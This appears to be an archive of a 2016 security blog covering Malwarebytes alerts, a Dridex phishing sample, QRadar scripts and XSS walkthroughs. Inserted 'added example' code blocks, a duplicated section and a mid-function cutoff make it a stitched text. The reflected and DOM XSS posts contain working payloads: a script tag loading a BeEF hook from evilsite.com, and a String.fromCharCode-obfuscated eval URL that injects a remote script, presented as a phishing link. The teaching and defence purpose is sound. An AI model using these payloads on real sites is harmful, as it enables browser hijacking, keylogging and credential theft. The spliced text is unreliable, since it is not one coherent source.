I thought this blog by fin1te explaining XSS on Facebook via PNGs was a great read, and worth the time of anybody interested in the topic.
The attackers will continue to evolve to evade detection and the good guys like us better stay on top of our game if we hope to stop (or even just detect) this madness!
More about neonprimetime
Top Blogs of all-time
Top Github Contributions
Copyright © 2015, this post cannot be reproduced or retransmitted in any form without reference to the original post.
Friday, January 29, 2016
Saturday, January 23, 2016
PUM.Optional.HomepageControl
Let's say you run Malwarebytes and get this alert.
PUM.Optional.HomepageControl, HKU\...\SOFTWARE\POLICIES\MICROSOFT\INTERNET EXPLORER\CONTROL PANEL|HomePage, 1, Good: (0), Bad: (1),,[...]
PUM stands for Potentially Unwanted Modification. This doesn't mean it's necessarily malicious. In fact, in most cases this particular alert is normal and expected, for example if you work at a company that automatically sets your homepage to its website. The reason Malwarebytes alerts you is for awareness, since there are some pieces of malware that purposely alter your home page, for example setting it to their malicious site, or change your search engine, etc.
Hijack.ControlPanelStyle ForceClassicControlPanel
Let's say you run Malwarebytes and get this alert.
Hijack.ControlPanelStyle, HKU\...\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER|ForceClassicControlPanel, 1, , [...]
All by itself this is likely just a false positive, since ForceClassicControlPanel is simply a true/false (1/0) value that determines whether you use the newer style Control Panel view or the Classic View. Now if this showed up alongside a bunch of other infections, then perhaps it could be related, as it shows up with infections that force the classic control panel, making it harder to navigate around and remove the malware.
Scripting Website Screenshot Captures
cutycapt is a nice tool that lets you script or automate collecting screenshots of websites.
As an example, after you download or install cutycapt (or use an OS like Kali that already has it installed), you type
cutycapt --url=http://neonprimetime.blogspot.com --out=neo.png
And boom, you have a screenshot in a png file.
Now add this command to some python script, for example, and you could in theory grab screenshots of an entire website if needed.
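Here is one way to do that scripting. This is an added example, not code from the original post: it drives the cutycapt command shown above from Python over a list of URLs (the URL list and output directory are constructed), derives a safe output filename from each URL so a crafted URL cannot write outside the output directory, passes arguments without a shell, and refuses non-http(s) schemes so the renderer is never pointed at local files.

```python
"""Batch website screenshots by driving cutycapt from Python.
Added example, not code from the original post: the URL list and output
directory are constructed; --url and --out are the cutycapt flags the post uses."""
import re
import subprocess
from pathlib import Path
from urllib.parse import urlparse


def output_name(url):
    """Derive a PNG filename from a URL. Host and path are reduced to
    [A-Za-z0-9_-], so '/' and '..' never reach the filesystem."""
    parsed = urlparse(url)
    raw = parsed.netloc + parsed.path
    safe = re.sub(r"[^A-Za-z0-9_-]+", "_", raw).strip("_") or "index"
    return safe[:120] + ".png"


def build_command(url, out_path):
    """Argument list for cutycapt. It is handed to subprocess as a list,
    so nothing in the URL is ever interpreted by /bin/sh."""
    return ["cutycapt", "--url=%s" % url, "--out=%s" % out_path]


def capture_all(urls, outdir, runner=subprocess.run, timeout=60):
    """Screenshot every URL into outdir. Returns {url: output path or None}.
    `runner` is injectable so the orchestration can be exercised where
    cutycapt is not installed."""
    outdir = Path(outdir)
    outdir.mkdir(parents=True, exist_ok=True)
    results = {}
    for url in urls:
        if urlparse(url).scheme not in ("http", "https"):
            results[url] = None  # refuse file:// and other local schemes
            continue
        out_path = outdir / output_name(url)
        try:
            proc = runner(build_command(url, str(out_path)),
                          timeout=timeout, check=False)
            results[url] = str(out_path) if proc.returncode == 0 else None
        except subprocess.TimeoutExpired:
            results[url] = None  # a hung renderer must not stall the batch
    return results


if __name__ == "__main__":
    # Constructed input: two pages from the post's own blog plus a URL
    # that must be skipped.
    pages = ["http://neonprimetime.blogspot.com",
             "http://neonprimetime.blogspot.com/2016/01/",
             "file:///etc/passwd"]
    for page, path in capture_all(pages, "shots").items():
        print(page, "->", path or "skipped/failed")
```

Running it with cutycapt installed writes one PNG per http(s) URL into `shots/`; the per-URL timeout matters in practice because a page that never finishes loading would otherwise block the whole crawl.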
Wednesday, January 20, 2016
Dridex 120205 Letter-response A3 2-2 Tim@plan4print.co.uk
Dridex email with VBA Macro Microsoft Word attachment seen this morning.
Attachment: 120205 Letter-response A3 2-2.doc
Sender: Tim Speed
Subject: Emailing: 120205 Letter-response A3 2-2
Callouts to: hxxp://www.lassethoresen.com
dynamoo blogs a bit about it here
Tuesday, January 19, 2016
User-Agent: Python-urllib/2.7
If you've ever seen an HTTP request like this in your logs and wondered what it is:
GET / HTTP/1.1
Accept-Encoding: identity
Host: www.mywebsite.com
Connection: close
User-Agent: Python-urllib/2.7
The most common explanation, based on the user-agent, is that somebody wrote a python script (or is using somebody else's) that is hitting your website. You can learn more about urllib2 at this link. It states that "By default urllib2 identifies itself as Python-urllib/x.y", which is what you see here: somebody has Python 2.7 installed and ran a command or script that used that library's default user-agent string when connecting.
Whether it's malicious or not is another story. It could be a security researcher just doing his thing and saving the world, or it could be a bad guy reconning or poking/prodding your site, or it could be some joe-blow script kiddie who grabbed somebody else's script and is experimenting across the Internet.
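Since the user-agent alone can't tell you which of those it is, the useful next step is to pull together what else that source did. The following is an added example, not code from the original post: it parses combined-format access log lines (the sample lines are constructed), flags requests whose User-Agent is the default string of a scripting library or CLI tool (Python-urllib, python-requests, curl, Wget, Go's http client), and summarizes per source IP the request count, the distinct paths touched and the agents seen, which is the context that separates a one-off fetch from a sweep.

```python
"""Flag requests carrying a scripting library's default User-Agent in a
combined-format access log and summarize them per source IP.
Added example, not code from the original post; the log lines are constructed."""
import re
from collections import defaultdict

# Apache/nginx "combined" format: ip ident user [ts] "req" status bytes "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Default User-Agent prefixes sent by common HTTP libraries and CLI tools
# when the author never set one.
DEFAULT_UA_PREFIXES = ("Python-urllib/", "python-requests/", "curl/",
                       "Wget/", "Go-http-client/")


def parse_line(line):
    """Return the fields of one log line, or None if it is not combined format."""
    match = LOG_RE.match(line)
    return match.groupdict() if match else None


def is_default_library_ua(user_agent):
    return user_agent.startswith(DEFAULT_UA_PREFIXES)


def summarize(lines):
    """Group flagged requests by source IP: request count, distinct paths,
    and the user-agent strings seen from that address."""
    summary = defaultdict(lambda: {"requests": 0, "paths": set(), "agents": set()})
    for line in lines:
        rec = parse_line(line)
        if rec is None or not is_default_library_ua(rec["ua"]):
            continue
        entry = summary[rec["ip"]]
        entry["requests"] += 1
        entry["paths"].add(rec["path"])
        entry["agents"].add(rec["ua"])
    return dict(summary)


# Constructed sample log: one scripted source hitting two paths, one
# ordinary browser visit, and one python-requests fetch of robots.txt.
SAMPLE_LOG = [
    '203.0.113.5 - - [19/Jan/2016:08:01:02 -0600] "GET / HTTP/1.1" 200 5123 "-" "Python-urllib/2.7"',
    '203.0.113.5 - - [19/Jan/2016:08:01:03 -0600] "GET /login HTTP/1.1" 404 210 "-" "Python-urllib/2.7"',
    '198.51.100.7 - - [19/Jan/2016:08:02:10 -0600] "GET /index.html HTTP/1.1" 200 5123 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) Chrome/47.0"',
    '198.51.100.9 - - [19/Jan/2016:08:03:00 -0600] "GET /robots.txt HTTP/1.1" 200 40 "-" "python-requests/2.9.1"',
]


if __name__ == "__main__":
    for ip, entry in sorted(summarize(SAMPLE_LOG).items()):
        print("%s: %d request(s), paths=%s, agents=%s" % (
            ip, entry["requests"], sorted(entry["paths"]), sorted(entry["agents"])))
```

Feed it your real access log instead of SAMPLE_LOG and look at the path sets: a single GET / is usually noise, while one address walking many paths under a default library agent deserves a closer look.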
Split Linux/Putty into 2 screens
Just wanted to share some linux 101 basics. Ever been in a linux/putty session and wanted to split it into 2 screens so you can do 2 tasks at a time?
As an example, in 1 screen you want to run some backups which are going to take a while, while in the other screen you want to do some actual work.
Type screen to start the screen program
Hit Ctrl-a then let go of those keys and hit upper case S to split the screen into 2
Hit Ctrl-a then let go of those keys and hit Tab to move your cursor to the 2nd screen
Hit Ctrl-a then let go of those keys and hit lowercase c to start a 2nd screen in that bottom window
Now you're free to Ctrl-a Tab back and forth between the 2 screens while doing 2 different tasks.
Palo Alto's Angler Exploit Kit Evasion Research
I thought this Palo Alto research on Angler Exploit Kit evasion was fascinating. It showed how compromised websites purposely go dormant/quiet many times during the day, and sometimes for many days, to trick security researchers into thinking they were taken down or cleaned up. It showed that compromised websites filter IP addresses, meaning the website may only serve the malicious content to certain countries, regions, targets, etc. It showed that payload URLs can change every half hour to hour. It also showed that the payload javascript can change every half hour to hour.
The attackers will continue to evolve to evade detection and the good guys like us better stay on top of our game if we hope to stop (or even just detect) this madness!
Qualys Scantronitor 2.0 - A Window into Scan Activity
If you use the Qualys tool for vulnerability scanning your environment, you may be familiar with the great tool created by Don Franke, Josh Stevens, and Pete Babcock that gives you what is tagged as "A Window into Scan Activity". As the Qualys community post stated, "Scantronitor is a self-service utility that provides non-Qualys® users with views into historical, ongoing and planned vulnerability assessments. Scantronitor improves relationships between the security team and other business units by allowing the business units to understand when Qualys scans are performed without having to ask the security team, giving the business units better visibility into the impact of scans on their systems." They even created a nice presentation to give you the look and feel of the original tool.
Imagine the scenario where your server teams or application teams want to know when you last scanned their device, possibly to troubleshoot a system issue or outage they had. Or to look at what scans are currently running now to see if it's related to an Incident they are working on. Or they want to know when the next scan is scheduled so they can plan their maintenance window. With Scantronitor you can give them that quick and simple visibility.
Scantronitor was written in PHP under the MIT License, source code posted on stevensj's github account, and hooks into the Qualys API v1.0.
I recently updated the original tool from Qualys API v1.0 to the newer Qualys API v2.0. I posted the Qualys API v2.0 updated source code over at @neonprimetime github. It's nothing special, no major changes, I mostly just ripped out the API v1.0 calls and replaced them with API v2.0 calls. There are some additional security considerations, just like in the original, that you'll want to consider before utilizing it, like how to authenticate users, how to store the API credentials and possibly your proxy credentials, etc. You can also read more about Qualys API v2.0 from their site here.
Hope you found this useful and once again a shout out to Don Franke, Josh Stevens, and Pete Babcock for the original content!
Download Scantronitor v2.0 source from @neonprimetime github.
Below are some screenshots from the updated version of scantronitor.
Scantronitor homepage header with Past, Present, and Future menu options.
Past screen that allows users to enter IP address or hostname and see when it was last scanned.
Present screen which will show any currently running scans.
Future screen which will show any future scheduled scans.
Labels:
Don Franke,
Josh Stevens,
Pete Babcock,
Qualys,
Qualys API,
Scantronitor,
stevensj
Friday, January 15, 2016
QRadar SIEM API call for Offenses Assigned to User
If interested, I wrote a simple python script and saved it on github that queries the QRadar SIEM API for Offenses Assigned to a specific user. If you missed it, I recently posted a 101 walk-through on how to get your api calls working. The script I wrote is just a variation of the default samples provided by IBM on their github.
After you have the default sample api calls working, just download my python script assigned_to.py and put it in the same folder. Then run it as follows.
# Offenses Assigned to Myself
> offenses/assigned_to.py -u MYUSERID
id:128 [MYUSERID] SrcIP=66.66.220.109
id:127 [MYUSERID] SrcIP=172.16.17.2
id:126 [MYUSERID] DstIP=61.61.61.33
id:125 [MYUSERID] DstIP=61.61.61.57
id:124 [MYUSERID] DstIP=10.0.0.2
# Offenses Not assigned to anybody yet
> offenses/assigned_to.py -u UNASSIGNED
id:133 [ ] SrcIP=190.190.117.177
id:132 [ ] User =USER22
id:131 [ ] SrcIP=66.66.103.118
Top Blogs of all-time
- pagerank botnet sql injection walk-thru
- php injection ali.txt walk-thru
- php injection exfil walk-thru
QRadar SIEM API 101 Walk-Through
I thought I'd share how I got the QRadar API working.
I downloaded the sample API python modules (RestApiClient.py, SampleUtilities.py, etc.) from github
I downloaded the sample API script (01_GetOffenses.py) from github
I saved them all to the same folder.
I made sure I had python3 installed (not 2).
Then I had to download our console website PEM from the certificate like so and save it to the same folder.
Then I had to create an authorized service/token.
Then run the script via
python 01_GetOffenses.py
It will prompt you to enter your authorization token (from the authorized service screen above) and your certificate location (copy the full path to the .crt file). Once you hit enter, you have the choice to save this token and certificate information to a plaintext file for future use. Then the API call runs and boom, you have a list of all offenses!
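To show what the two QRadar posts above (the assigned_to.py script and this 101 walk-through) boil down to in a single self-contained piece of code, here is an added example; it is neither IBM's sample client nor the post's assigned_to.py. Assumptions: the console hostname and CA file path are placeholders, the SEC token is read from the QRADAR_SEC_TOKEN environment variable rather than from the plaintext file the sample offers to write, and the offense_type-to-label mapping is assumed. The /api/siem/offenses endpoint, the SEC header and the offense fields id, assigned_to, offense_type and offense_source are the documented QRadar REST API names. The sample offenses are constructed so the filtering and formatting run offline.

```python
"""Pull offenses from the QRadar REST API and list the ones assigned to one
user. Added example, not IBM's sample client and not the post's assigned_to.py."""
import json
import os
import ssl
import urllib.request

# Assumed offense_type codes: 0 source IP, 1 destination IP, 3 username.
OFFENSE_TYPE_LABELS = {0: "SrcIP", 1: "DstIP", 3: "User"}


def build_request(console, token):
    """Request for the offenses endpoint, authenticated with the token of an
    authorized service via the SEC header (the 101 walk-through's step)."""
    req = urllib.request.Request("https://%s/api/siem/offenses" % console)
    req.add_header("SEC", token)
    req.add_header("Accept", "application/json")
    return req


def fetch_offenses(console, token, cafile):
    """Call the API, validating the console certificate against the exported
    CA file instead of turning verification off."""
    ctx = ssl.create_default_context(cafile=cafile)
    with urllib.request.urlopen(build_request(console, token), context=ctx, timeout=30) as resp:
        return json.load(resp)


def offenses_assigned_to(offenses, user):
    """Filter by assignee; the special value UNASSIGNED selects offenses whose
    assigned_to is null or empty, matching the post's -u UNASSIGNED usage."""
    selected = []
    for offense in offenses:
        owner = offense.get("assigned_to") or ""
        if user == "UNASSIGNED":
            if owner == "":
                selected.append(offense)
        elif owner == user:
            selected.append(offense)
    return selected


def format_offense(offense):
    """One line per offense in the post's output style: id:N [owner] label=source."""
    owner = offense.get("assigned_to") or " "
    label = OFFENSE_TYPE_LABELS.get(offense.get("offense_type"), "Source")
    return "id:%s [%s] %s=%s" % (offense["id"], owner, label, offense.get("offense_source"))


# Constructed sample in the shape of the API's JSON, for offline use.
SAMPLE_OFFENSES = [
    {"id": 128, "assigned_to": "MYUSERID", "offense_type": 0, "offense_source": "66.66.220.109"},
    {"id": 126, "assigned_to": "MYUSERID", "offense_type": 1, "offense_source": "61.61.61.33"},
    {"id": 133, "assigned_to": None, "offense_type": 0, "offense_source": "190.190.117.177"},
    {"id": 132, "assigned_to": None, "offense_type": 3, "offense_source": "USER22"},
]


if __name__ == "__main__":
    import sys
    user = sys.argv[1] if len(sys.argv) > 1 else "UNASSIGNED"
    token = os.environ.get("QRADAR_SEC_TOKEN")
    if token:
        # Placeholder hostname and CA file path; replace with your console's.
        offenses = fetch_offenses("qradar-console.example", token, "console-ca.crt")
    else:
        offenses = SAMPLE_OFFENSES
    for offense in offenses_assigned_to(offenses, user):
        print(format_offense(offense))
```

Without the environment variable set it prints from the constructed sample; with it set, it queries the console over a verified TLS connection. Keeping the token in the environment (or a secrets store) rather than a plaintext file beside the script is the main change from the sample's default behaviour.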
Wednesday, January 13, 2016
Uptick in SEO SQL Injection Attacks
This State of the Internet advisory from Akamai about a continuous uptick in SEO sql injection attacks was a really good read and falls directly in line with a recent article I wrote about what I called the PageRank botnet sql injection, describing one of these attacks in detail.
I just find it fascinating how these things can spread, and it gives you an idea of how poorly the Internet is doing with secure coding practices and patching of known vulnerabilities, because if we were doing well then attackers would have no reason to build such attacks; in general we must be failing, because these types of attacks continue to be prevalent and successful.
Labels:
Akamai,
PageRank Botnet,
SEO,
SQL Injection,
SQLi
Article on Phishing eBay with XSS
This article on how to build an eBay phishing site I found a quick read and very informative. It walks through, after finding an XSS flaw, how to make a copy of the website with WebHTTrack, make the modifications necessary to steal credentials from the html form, and the final link you'd drop into your phishing email. Good article by @ret2libc
More evidence that XSS flaws are bad and you should fix them immediately if your website scanner finds one.
Tuesday, January 12, 2016
XSS Flaws lead to Keylogging,Webcams, & more
I've enjoyed talking about XSS many times on this blog. Today is another one of those days! We're going to bring it hopefully full circle this time. First just as a heads up I'm working in my VM environment with networking configured like this to have a Kali linux box with Apache Web Server and also with BeEF and a windows 7 box with chrome.
Let's say a developer wrote a vulnerable PHP user page on his goodsite.com with this line of code. It's vulnerable to XSS because it just echoes the user-controlled input back to the page. This can be really bad, as we'll see in a minute.
echo sprintf("User: %s", $_GET['userid']);
Now an evil attacker may swoop in, discover this flaw, and try to get one of your users of the website to click on a link that looks like this
Notice the javascript that tries to load a hook.js file from an evil site. We'll get to what that is later. First you should know that by default Chrome and many modern browsers actually would've saved your life already. Chrome's XSS auditor would've caught this and silently blocked it. You can see this if you view source and find the red highlighted text.
But let's say I was running an older insecure browser, the vulnerability was actually somewhere else and Chrome didn't catch it, or I'm evil and know how to evade the XSS Auditor, or I simply disabled the xss auditor feature (don't do this) in chrome like below.
Then truly bad things will happen, as you see below. The evil attacker got my end user to go to my goodsite, but per Chrome's developer tools tab (F12) I'm able to see that even though my good page loaded, in the background something more evil loaded as well: a hook.js file from evilsite.com, which came from the XSS injection of the script src tag. In addition, notice that hook.js isn't done yet. It has actually created persistence. It's now running over and over every few seconds. This looks bad.
Over on the BeEF console the attacker probably sees some log like this showing him that you've joined his party
And at his disposal he can do whatever he wants as long as your browser and plugin versions support it including evil stuff like enabling your webcam
Or if you happen to type in a password or credit card
He's going to see that as well
One thing I found really cool about BeEF is that the javascript code behind the scenes that makes these hooks, keylogging, etc. work is all right there for you to view.
So if you're like me and have a background in web development as a good guy, then you can figure out exactly what code some of the bad guys are taking advantage of.
And finally I'll harp on it again, if you're a web developer, hopefully this blog post gives you another good reason to take XSS flaws seriously for the sake of your end user.
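For the web developers the post is addressing, the fix for the echo line above is output encoding at the point where user input lands in HTML, plus a Content-Security-Policy as a second layer so that a script tag pointing at another origin would not execute even if an encoding mistake slipped through. The following is an added example, not the post's PHP: it re-implements the vulnerable `sprintf("User: %s", $_GET['userid'])` in Python beside a hardened handler (html.escape plays the role of PHP's htmlspecialchars with ENT_QUOTES), and checks that the injected script tag from the post's scenario never reaches the page unescaped. The query string and header set are constructed; the handler names are hypothetical.

```python
"""Vulnerable reflected echo beside its hardened form.
Added example, not the post's PHP; handler names are hypothetical."""
import html
from urllib.parse import parse_qs


def _userid_from(query):
    params = parse_qs(query, keep_blank_values=True)
    return params.get("userid", [""])[0]


def render_user_vulnerable(query):
    """Same bug as echo sprintf("User: %s", $_GET['userid']): the raw
    parameter is concatenated straight into the HTML response."""
    return "User: %s" % _userid_from(query)


def render_user_hardened(query):
    """Encode the parameter for an HTML text context and add CSP so that
    scripts from any origin other than the site's own are refused by the
    browser. Returns (body, headers)."""
    body = "User: %s" % html.escape(_userid_from(query), quote=True)
    headers = {
        "Content-Type": "text/html; charset=utf-8",
        # Defence in depth: with this policy a <script src="http://evilsite.com/...">
        # would not run even if it did end up in the page.
        "Content-Security-Policy": "default-src 'self'; script-src 'self'",
    }
    return body, headers


def contains_script_tag(markup):
    """Crude check used here to compare the two handlers' output."""
    return "<script" in markup.lower()


# Constructed query string in the shape of the post's scenario: the userid
# parameter carries a script tag loading hook.js from evilsite.com.
INJECTED_QUERY = 'userid=<script src="http://evilsite.com/hook.js"></script>'


if __name__ == "__main__":
    print("vulnerable:", render_user_vulnerable(INJECTED_QUERY))
    body, headers = render_user_hardened(INJECTED_QUERY)
    print("hardened:  ", body)
    print("CSP:       ", headers["Content-Security-Policy"])
```

The encoded output renders the attacker's text literally on the page instead of as markup, and the CSP header is what turns a missed encoding from a full browser hook into a blocked request that shows up in the browser console and, if you add a report-uri, in your logs.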
Labels:
BeEF,
Chrome,
Hook,
Keylogger,
Keylogging,
PHP,
Webcam,
XSS,
XSS Auditor,
XSS Filter
Getting 2 Virtual Box VMs to Talk to Eachother
Let's say I wanted to run through some security walk-through, BeEF for example, but I don't want to touch my host device; I want to do it with multiple VMs in Virtual Box.
One of the trickier things sometimes with VMs is getting networking set up correctly so 2 of them can talk to each other. Today I'll show you how to get your Kali Linux VM and your Windows 7 VM to talk to each other in both directions. Here's one simple way to do it.
Step 1 - Setup a Global Network
a.) Go to File->Preferences
b.) Click the plus sign and Add a new network, give it a name, leave the rest as default
Step 2 - Set each VM to use the new Global Network
a.) For each VM, go to Settings -> Network
b.) Select the new Global Network you created (I called mine BeEf)
Step 3 - Validate they can connect
a.) For each VM, find out the IP address it was assigned (this is a private address that only other VMs in the new global network you created can see). You cannot access this IP from your host or from other unrelated VMs. In Windows, find your IP address by typing ipconfig /all. In Linux, find it by typing ifconfig.
b.) For each VM, go to the command line and try to ping the other; this should work.
c1.) If desired, to complete your validation, start a web server in Windows using IIS Express. Then from Linux try to access it in a browser via the IP address.
c2.) And if desired, to complete your validation, start a web server in Linux using the BeEF UI. Then from Windows try to access it in a browser via the IP address.
You should be done and have bi-directional communication so you're ready to start hooking browsers or doing whatever else you desire in your own little area.
More about neonprimetime
Top Blogs of all-time
Copyright © 2015, this post cannot be reproduced or retransmitted in any form without reference to the original post.
One of the trickier things sometimes with VMs is getting Networking setup correctly so 2 of them can talk to eachother. Today I'll show you how to get your Kali Linux vm and your Windows 7 vm to talk to eachother in both directions. Here's one simple way to do it.
Step 1 - Setup a Global Network
a.) Go to File->Preferences
b.) Click the plus sign and Add a new network, give it a name, leave the rest as default
Step 2 - Set each VM to use the new Global Network
a.) For each VM, go to Settings -> Network
b.) Select the new Global Network you created (I called mine BeEf)
Step 3 - Validate they can connect
a.) For each VM, find out it's IP address that it was assigned (this is a private address that only other VMs in that new global network you created can see). You cannot access this IP from your host or from other unrelated VMs. In windows, find your IP address by typing ipconfig /all. In linux, find it by typing ifconfig.
b.) For each VM, go to the command line and try to ping the other, this should work
c1.) If desired, to complete your validation, in Windows start a web server your IIS Express. Then from Linux try to access it via browser via the IP address.
c2.) And if desired, to complete your validation, in Linux start a web server your BeEf ui. Then from Windows try to access it via browser via the IP address.
You should be done and have bi-directional communication so you're ready to start hooking browsers or doing whatever else you desire in your own little area.
Labels: NAT, NAT Network, Oracle Virtual Box, Virtual Box
Monday, January 4, 2016
DOM XSS 101 Walk-Through
We've talked about XSS (Cross-Site Scripting) before on this blog. I thought it would be good to walk through a form of XSS that we really haven't covered yet: DOM (Document Object Model) XSS. The prior discussions we've had about XSS have revolved mostly around Stored and Reflected XSS. Stored XSS is where the attack payload is stored server-side, likely in a database table, and is loaded from the database every time any user visits a particular page. Reflected XSS is where the browser sends an attack request to the web server, and the web server responds with (or reflects) that attack back to the end user. Both Stored and Reflected XSS involve server-side communication, so there is a chance, if done correctly, for the server to sanitize or block the XSS attack before it ever reaches the user. Another type of XSS worth talking about is DOM XSS. This attack is purely client-side; the payload likely never makes it to the server, so the server has no way of protecting the user against it. The only forms of protection are proper coding by the developer or the browser itself detecting and blocking the attack. It is possible, depending on how the attack is performed, that the server might log the web request, but by then it may be too late and the attack may already have occurred. There are also ways, using the # character (hash/pound), for an attacker to prevent these DOM attacks from even being logged by the server, since the browser never sends the fragment part of a URL to the server, so the attack may go completely unnoticed.
I pasted an example of some poorly written JavaScript that is vulnerable to DOM XSS.
Let's say I have a website with a URL that looks like this: hxxp://myurl.com/domxsstest.html?userid=123456
And say I want to write some JavaScript that will log the userid to the Chrome/Firefox/IE developer console for general troubleshooting.
// Logs the user id to the browser developer console (Chrome/Firefox/IE).
function logUserId(userid){
    console.log('debug: userid found was \'' + userid + '\'');
}
And in order to pull that userid out of the url and log it, I wrote this perfectly legit and functioning javascript code.
// Read the full URL (including any fragment after #), take everything after
// "userid=", and build a string of JavaScript that calls logUserId() with it.
var myurl = window.location.href;
var useridstartindex = myurl.indexOf("userid=") + 7; // 7 is the length of "userid="
var userid = myurl.substring(useridstartindex, myurl.length);
var calllogfunction = 'logUserId(' + userid.toString() + ')';
// eval() runs that string as code, so whatever follows "userid=" in the URL runs too.
eval(calllogfunction);
Since the above JavaScript uses the unsafe eval() function and does not properly sanitize the user input (the query string parameter 'userid'), an attacker could do the following to exploit this vulnerable code.
First, to understand the concept: the attacker controls the value of the calllogfunction variable and can inject his own code into it, which then executes in the browser in the origin/scope of the domain it's on (such as myurl.com). This can be very bad and can lead to malware, keystroke logging, drive-by downloads, credential theft, internal network recon, and much more.
At a super high level, we'd expect the calllogfunction variable to end up containing this
logUserId(12345)
But in my example below, as the attacker I am able to change the value of the calllogfunction variable to something like the following, where I completely control 'my evil code':
logUserId(12345);eval('my evil code')
As a more realistic example, I'm going to make it look like this:
logUserId(12345);eval(s=document.createElement('script'); s.src='http://neonprimetime.blogspot.com/fakehook.js'; document.getElementsByTagName('head')[0].appendChild(s))
If we quickly run through this code, here's what it does:
logUserId(12345);
The above line logs the userid as the developer desired.
eval(s=document.createElement('script');
The above line then creates a new script tag which is where the attacker will insert his javascript code.
s.src='http://neonprimetime.blogspot.com/fakehook.js';
The above line then sets the source of the javascript code to his evil website hook script which does the bad things like installing malware, keylogging, or whatever is desired.
document.getElementsByTagName('head')[0].appendChild(s)
The above line finally finds the head tag in the HTML page and dynamically appends the attacker's script tag to it. So just like that, with a few lines of JavaScript, the attacker's evil JavaScript (hosted at neonprimetime.blogspot.com) is now running inside the user's browser under the origin/scope of the good site myurl.com.
So now to make this attack work, we simply need to adjust our url and get the victim user to click our adjusted url.
The first thing the attacker would do is take the evil code above (s=document.createElement........), drop it into a free utility like this one that converts the evil string code to integer character codes such as these ( 115, 61, 100, 111, 99, 117, 109, 101, 110, 116, 46, 99, 114, 101, 97, 116, 101, 69, 108, 101, 109, 101, 110, 116, 40, 39, 115, 99, 114, 105, 112, 116, 39, 41, 59, 115, 46, 115, 114, 99, 61, 39, 104, 116, 116, 112, 58, 47, 47, 110, 101, 111, 110, 112, 114, 105, 109, 101, 116, 105, 109, 101, 46, 98, 108, 111, 103, 115, 112, 111, 116, 46, 99, 111, 109, 47, 102, 97, 107, 101, 104, 111, 111, 107, 46, 106, 115, 39, 59, 100, 111, 99, 117, 109, 101, 110, 116, 46, 103, 101, 116, 69, 108, 101, 109, 101, 110, 116, 115, 66, 121, 84, 97, 103, 78, 97, 109, 101, 40, 39, 104, 101, 97, 100, 39, 41, 91, 48, 93, 46, 97, 112, 112, 101, 110, 100, 67, 104, 105, 108, 100, 40, 115, 41, 59 )
This is done for at least two reasons. One is to avoid issues where a closing tick mark like this ' would terminate the original eval JavaScript statement; if that tick mark terminates the statement, the attacker's code won't get executed. The second reason is obfuscation: it makes it harder for a WAF (web application firewall) or other tools to detect and block evil code, since the possible obfuscated combinations are practically endless.
We then add a call to the powerful Javascript function String.fromCharCode() which works the magic of converting our integers back into the evil code to execute. Thus we'd end up changing this hxxp://myurl.com/domxsstest.html?userid=123456 to something uglier like this hxxp://myurl.com/domxsstest.html?userid=123456);eval(String.fromCharCode(115,61,100,111,99,117,109,101,110,116,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,115,46,115,114,99,61,39,104,116,116,112,58,47,47,110,101,111,110,112,114,105,109,101,116,105,109,101,46,98,108,111,103,115,112,111,116,46,99,111,109,47,102,97,107,101,104,111,111,107,46,106,115,39,59,100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59))//
Then you throw this link into a phishing email or submit it to a message board or via social media messaging and get somebody to click on it. They're more likely to click on a link like this because even if they hover over the link and manually review it with their eyes prior to clicking, they'll see that the url is coming directly from their trusted url (myurl.com) so they'll be satisfied and click. But once they click, they're hooked, they're infected, and the bad guy has what he wants, control over that browser.
You can test out the code from the pastebin link above locally and watch, as we discussed, the console log the userid just as expected.
But also in the background (the end user would never know), the JavaScript hook file was loaded from the second domain.
OWASP, as usual, has a great link describing how to prevent attacks like this. You could also add HTTP headers like Content-Security-Policy to restrict which domains scripts can ever be loaded from, thus preventing the attacker's JavaScript from even being loaded by the browser, even if you are vulnerable to DOM XSS. This blog is a good quick read about those headers.
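To make the "proper coding by the developer" point concrete, here is the post's userid extraction as pure functions over a URL string (so it runs outside a browser), with the vulnerable string-building pattern beside a simple check for the breakout it enables and a hardened version that parses the query string and validates the id instead of building code. This is an added example, not code from the original post; the function names, the constructed sample URLs and the shortened String.fromCharCode(...) placeholder are assumptions, and the fragment URL illustrates the # point made in the introduction.

```javascript
// Added example (not from the original post). Pure functions over a URL
// string so they run under Node: no window.location, no eval().

// VULNERABLE: the post's extraction logic, unchanged. Everything after
// "userid=" lands verbatim inside the string the page then eval()s.
function buildLogCallVulnerable(url) {
  var useridstartindex = url.indexOf("userid=") + 7;
  var userid = url.substring(useridstartindex, url.length);
  return 'logUserId(' + userid + ')';
}

// Detection check: the only legitimate shape of that string is
// logUserId(<digits>). Anything else means the URL carried code.
function looksInjected(callString) {
  return !/^logUserId\(\d+\)$/.test(callString);
}

// HARDENED: parse the query string with URL/URLSearchParams, allow-list
// the value as a short run of digits, and pass it on as data. The
// fragment (#...) is never consulted, so a payload hidden there is
// ignored rather than executed.
function extractUserId(url) {
  var userid = new URL(url).searchParams.get("userid");
  if (userid === null || !/^\d{1,12}$/.test(userid)) {
    return null;
  }
  return userid;
}

function logUserIdSafe(url) {
  var userid = extractUserId(url);
  if (userid === null) {
    console.log("debug: userid missing or malformed, not logging it");
    return null;
  }
  // Direct call with a plain value: no string-to-code step anywhere.
  console.log("debug: userid found was '" + userid + "'");
  return userid;
}

// Constructed sample URLs (assumptions for this example). The crafted
// ones reuse the breakout shape shown in the post, with a three-character
// placeholder ("s=d") in place of the hook loader.
var benignUrl = "http://myurl.com/domxsstest.html?userid=123456";
var craftedQueryUrl =
  "http://myurl.com/domxsstest.html?userid=123456);eval(String.fromCharCode(115,61,100))//";
var craftedFragmentUrl =
  "http://myurl.com/domxsstest.html#userid=123456);eval(String.fromCharCode(115,61,100))//";

// For each URL: what the vulnerable page would eval, whether the check
// flags it, and what the hardened parser accepts.
function demo() {
  return [benignUrl, craftedQueryUrl, craftedFragmentUrl].map(function (u) {
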